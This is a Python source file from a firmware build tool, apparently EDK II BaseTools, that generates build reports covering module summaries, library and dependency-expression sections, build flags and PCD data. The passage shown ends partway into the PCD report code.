# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
# This constructor function generates PcdReport object a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
#
# Collect the PCD defined in DSC/FDF file, but not used in module
#
UnusedPcdFullList = []
for item in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[item]
if not Pcd.Type:
# check the Pcd in FDF file, whether it is used in module first
for T in PCD_TYPE_LIST:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
if Pcd in PcdList:
Pcd.Type = T
break
if not Pcd.Type:
PcdTypeFlag = False
for package in Pa.PackageList:
for T in PCD_TYPE_LIST:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
Pcd.Type = T
PcdTypeFlag = True
if not Pcd.DatumType:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
break
if PcdTypeFlag:
break
if not Pcd.DatumType:
PcdType = Pcd.Type
# Try to remove Hii and Vpd suffix
if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
PcdType = TAB_PCDS_DYNAMIC_EX
elif PcdType.startswith(TAB_PCDS_DYNAMIC):
PcdType = TAB_PCDS_DYNAMIC
for package in Pa.PackageList:
if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
break
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd in UnusedPcdList:
UnusedPcdList.remove(Pcd)
if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
UnusedPcdFullList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
self.MaxLen = len(Pcd.TokenCName)
if GlobalData.gConditionalPcds:
for PcdItem in GlobalData.gConditionalPcds:
if '.' in PcdItem:
(TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
UnusedPcdList = []
if UnusedPcdFullList:
for Pcd in UnusedPcdFullList:
if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
continue
UnusedPcdList.append(Pcd)
for Pcd in UnusedPcdList:
PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
for Module in Pa.Platform.Modules.values():
#
# Collect module override PCDs
#
for ModulePcd in Module.M.ModulePcdList + Module.M.LibraryPcdList:
TokenCName = ModulePcd.TokenCName
TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
ModuleDefault = ModulePcd.DefaultValue
ModulePath = os.path.basename(Module.M.MetaFile.File)
self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
#
# Collect PCD DEC default value.
#
self.DecPcdDefault = {}
self._GuidDict = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
Guids = Package.Guids
self._GuidDict.update(Guids)
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
#
# Collect PCDs defined in DSC common section
#
self.DscPcdDefault = {}
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
if DscDefaultValue:
self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
def GenerateReport(self, File, ModulePcdSet):
if not ModulePcdSet:
if self.ConditionalPcds:
self.GenerateReportDetail(File, ModulePcdSet, 1)
if self.UnusedPcds:
IsEmpty = True
for Token in self.UnusedPcds:
TokenDict = self.UnusedPcds[Token]
for Type in TokenDict:
if TokenDict[Type]:
IsEmpty = False
break
if not IsEmpty:
break
if not IsEmpty:
self.GenerateReportDetail(File, ModulePcdSet, 2)
self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
